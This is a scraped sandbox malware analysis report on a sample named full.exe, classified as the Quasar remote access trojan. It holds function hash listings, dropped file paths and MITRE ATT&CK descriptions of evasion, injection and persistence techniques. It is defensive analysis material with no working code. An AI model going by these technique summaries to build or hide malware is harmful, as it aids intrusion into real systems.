Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 013E65BE
GetCurrentThread.KERNEL32 ref: 013E65FB
GetCurrentProcess.KERNEL32 ref: 013E6638
GetCurrentThreadId.KERNEL32 ref: 013E6691

Memory Dump Source

Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a90408d1ef090df15b00f361ae717e319fa3b4abb483ce03e71e40d022a3f83d
Instruction ID: 927a71ab4e482ecc2bd9043d4339bc464c9644b647b700b54dfbed3bc8843d15
Opcode Fuzzy Hash: a90408d1ef090df15b00f361ae717e319fa3b4abb483ce03e71e40d022a3f83d
Instruction Fuzzy Hash: A16187B0910709CFEB14DFA9D54979EBFF0AF48308F20855AE009A7391DB759944CB65

Function 013E6540 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 013E65BE
GetCurrentThread.KERNEL32 ref: 013E65FB
GetCurrentProcess.KERNEL32 ref: 013E6638
GetCurrentThreadId.KERNEL32 ref: 013E6691

Memory Dump Source

Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e501fd97eb4fee3375446b0a3f596f20806e611d01524555473644872ed1ad85
Instruction ID: ffcb5c96c3b33dcd3825d4c94c79cd1acb37a8bbfe64fe204d567e272552024a
Opcode Fuzzy Hash: e501fd97eb4fee3375446b0a3f596f20806e611d01524555473644872ed1ad85
Instruction Fuzzy Hash: 795157B0910709CFEB14DFA9D548B9EBBF1EF88314F208459E419A7390DB74A944CF65

Function 013EBFF0 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 013EC256

Memory Dump Source

Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 446f135d09425308abaf371e04763386eef8780a25f86dc32283ad02c818adf0
Instruction ID: 4ef282912ea6e5b440c3c305eac849da0cd16ef16331da869d79a2f233fa25c9
Opcode Fuzzy Hash: 446f135d09425308abaf371e04763386eef8780a25f86dc32283ad02c818adf0
Instruction Fuzzy Hash: 3C8139B0A00B158FE725DF69D44975ABBF1FF88208F10892DD48AD7B80D775E849CB91

Function 013E7364 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 013E7421

Memory Dump Source

Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a3fa47f278d00cc2d646a33593030a18ea9c6c2bf0575d9ea3a4913729bcca66
Instruction ID: 298b209fa4b0437fff9b91815a8cde836f8361e5fe5a0490a37074376db80015
Opcode Fuzzy Hash: a3fa47f278d00cc2d646a33593030a18ea9c6c2bf0575d9ea3a4913729bcca66
Instruction Fuzzy Hash: B141AF71C00729CBEB25DFA9C848BDEBBF5BF45704F20806AD408AB255DBB56945CF90

Function 013E6414 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 013E7421

Memory Dump Source

Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 3132eff094a2eb5691c4a631f752dc2780198185dfe8a58b2fc96881fc53c058
Instruction ID: ee43d1be4d27dc54ebf0df446237677cea737182f73507c6c6bfd4c5d6c064ea
Opcode Fuzzy Hash: 3132eff094a2eb5691c4a631f752dc2780198185dfe8a58b2fc96881fc53c058
Instruction Fuzzy Hash: 4D417E70C047298BEB24DFA9C848BDEBBF5BF49704F20806AD418AB255DBB56945CF90

Function 013E6780 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013E680F

Memory Dump Source

Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0cd2681e1808719a73d520862ebbb499c71c01ac9a801d34af7e40f11ea4d898
Instruction ID: 699786c0f1ca6ea3b2b36d2596e3aea96b925d16b070c3d1255ec7a6644589b8
Opcode Fuzzy Hash: 0cd2681e1808719a73d520862ebbb499c71c01ac9a801d34af7e40f11ea4d898
Instruction Fuzzy Hash: 9821F3B5D00319AFDB10CF9AD884ADEBBF8EB48324F14841AE918A3751D374A940CFA5

Function 013E6788 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013E680F

Memory Dump Source

Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 828c21698d8b530ba62cdf6c511e5955c2def263d10b7a908276f6db455b4d85
Instruction ID: 248f26a4aeae4c83b5ab20a400caf58e6438a256094cc40a58f6e4e423878af7
Opcode Fuzzy Hash: 828c21698d8b530ba62cdf6c511e5955c2def263d10b7a908276f6db455b4d85
Instruction Fuzzy Hash: 0521E4B5900309AFDB10CFAAD884ADEBFF4FB48310F14841AE914A3350D374A944CFA1

Function 013EC1F0 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 013EC256

Memory Dump Source

Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f41738f4b209bfa219bdf62ab0e736d51c2bd34db93aacac4f0e13da4771cccc
Instruction ID: e0e0a339fde933c833d98dff8332b3a19616d052219a2f5e69fd536ba21866d3
Opcode Fuzzy Hash: f41738f4b209bfa219bdf62ab0e736d51c2bd34db93aacac4f0e13da4771cccc
Instruction Fuzzy Hash: D5110FB5C003498FDB10DF9AC448A9EFBF4EB88214F10842AD829A7650D379A545CFA1

Function 0786C528 Relevance: 1.5, APIs: 1, Instructions: 47
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 0786C58D

Memory Dump Source

Source File: 00000008.00000002.2043826099.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7860000_InstallUtil.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c98728917a197071c96e6f5fa3ec650be97924dc76519c25f99a3368c1701035
Instruction ID: ca6675a6c55e026868a04e1e93651d9c9dff869dba19d8e39d4906008dbd965d
Opcode Fuzzy Hash: c98728917a197071c96e6f5fa3ec650be97924dc76519c25f99a3368c1701035
Instruction Fuzzy Hash: 9D1106B5800349AFDB10DF9AD849BDEFBF8FB48314F108419E558A7200D375A544CFA1

Function 0786C530 Relevance: 1.5, APIs: 1, Instructions: 44
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 0786C58D

Memory Dump Source

Source File: 00000008.00000002.2043826099.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7860000_InstallUtil.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 5acdade33211c87e7952314aeabb2f295d5c7f1763bd587d4e41e4695a1eacc5
Instruction ID: 389c7aa562818e7385b9bb2a7078ef93e1fc20f376921299963c3adc048f2b4b
Opcode Fuzzy Hash: 5acdade33211c87e7952314aeabb2f295d5c7f1763bd587d4e41e4695a1eacc5
Instruction Fuzzy Hash: E411E5B58003499FDB10DF9AD889BDEFBF8FB48310F10841AD958A7650D375A944CFA1

Function 0134D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1942959805.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_134d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee911d4456c2703ea725cd8db80a3dae64a1a8f1723deb006ec3a759cd0c786
Instruction ID: 01dd9f7e3799e8fc50c3af28ee7a71b608a1099726390cc148f79c688cf5fbc5
Opcode Fuzzy Hash: 4ee911d4456c2703ea725cd8db80a3dae64a1a8f1723deb006ec3a759cd0c786
Instruction Fuzzy Hash: 0D212571500344DFDB05DF94D9C0B26BBA5FB9831CF2481ADE90A4B256C736E856CBE2

Function 0135D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1943123152.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_135d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52e6b155fd54c523d3a1db843cdaeed70c81550bb09a5b1e65009cdf4819f6e2
Instruction ID: 061fc2ac6d32ca62bb29ad810a8228a2ebbe10799a507bd3d897c4754b7af6ad
Opcode Fuzzy Hash: 52e6b155fd54c523d3a1db843cdaeed70c81550bb09a5b1e65009cdf4819f6e2
Instruction Fuzzy Hash: F3210071604344DFDB55DF54D8C0F26BB65FB84618F24C569DC0A4B286C33AD807CAA2

Function 0135D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1943123152.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_135d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c80ce70c0445d3f1dfd58f3bdfecc2b8a45dcc7f2f35eca2ec4e315ccd07f247
Instruction ID: 4b73ad5cfdebd009e1f4fa23566e5fb337b93718527bf2f8182d8483fad6d5b6
Opcode Fuzzy Hash: c80ce70c0445d3f1dfd58f3bdfecc2b8a45dcc7f2f35eca2ec4e315ccd07f247
Instruction Fuzzy Hash: DF21A1755093808FDB03CF64D9D0B15BF71EB45218F28C5EAD8498B6A7C33AD44ACB62

Function 0134D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1942959805.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_134d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
Instruction ID: 501963d05c4512df75eb3bb1a86c7f642d812babb7731f2ca3f37cd4b6f0fb98
Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
Instruction Fuzzy Hash: 8611E172404240CFCB02CF44D5C0B16BFB1FB94318F2482E9D8090B257C33AE456CBA1

Function 0134D603 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1942959805.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_134d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4757bb4c213fa937b92420a67ed8429236f33b9e8d98a7968fd0351f6d549f8
Instruction ID: 2433f320e0675eaebbde37eb4d80f884ebc11e41d5dccf3d106c5193e739f489
Opcode Fuzzy Hash: f4757bb4c213fa937b92420a67ed8429236f33b9e8d98a7968fd0351f6d549f8
Instruction Fuzzy Hash: 03F0F976200604AFD7209F0AD884C23FBEDEBD4674755C55AEC4A4B612C675FC41CEA0

Function 0134D5F4 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1942959805.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_134d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cde09d479f7c77b6b75ea6dda73f6b087fa054f81944a9af4428912cd9879c1
Instruction ID: 1f6f2930d83addd890fd27cdc48ca0dc096fc46089a2bbe55b87bd028ee1e4cf
Opcode Fuzzy Hash: 8cde09d479f7c77b6b75ea6dda73f6b087fa054f81944a9af4428912cd9879c1
Instruction Fuzzy Hash: D7F03779104680AFD325CF16C884C22BBF9EF9966071A8489E84A8B762C675FC42CF60

Non-executed Functions

Function 013EF03C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1943605364.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13e0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acb6253187d34f85b72e44e9ac15a64b503136a2fa267e2c374e095be9adb017
Instruction ID: 6da53d91d0637c5a071cf23cc0787a489fcdecd112416103ac979934d3124f4b
Opcode Fuzzy Hash: acb6253187d34f85b72e44e9ac15a64b503136a2fa267e2c374e095be9adb017
Instruction Fuzzy Hash: 1FA15032A0031ACFCF05DFB8D4485AEBBF6FF85304B15856AE905AB2A1DBB1D955CB40

Function 07866D88 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2043826099.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7860000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c0d2e44d8eb7b21835fdff266732808fadadaee68935279ed0df5fc5cf36bc3
Instruction ID: ca0d37b27651b7823ccebf8f0b3ed0decc27c0fa9d5bf535962a0f72f8191f2c
Opcode Fuzzy Hash: 0c0d2e44d8eb7b21835fdff266732808fadadaee68935279ed0df5fc5cf36bc3
Instruction Fuzzy Hash: 43911A797012059FD704EF39D994A6E77A2AF89750F208069EA11CF3B4EB71EC01CB90

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report full.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Quasar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Adobe.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22m3fc5x.1kg.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pl5kkvy2.b43.ps1

C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat

\Device\ConDrv

\Device\Null

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
full.exe

Function 0786A620 Relevance: .7, Instructions: 709
COMMON

Function 013E6518 Relevance: 6.1, APIs: 4, Instructions: 148
threadCOMMON

Function 013E6540 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 013EBFF0 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Function 013E7364 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

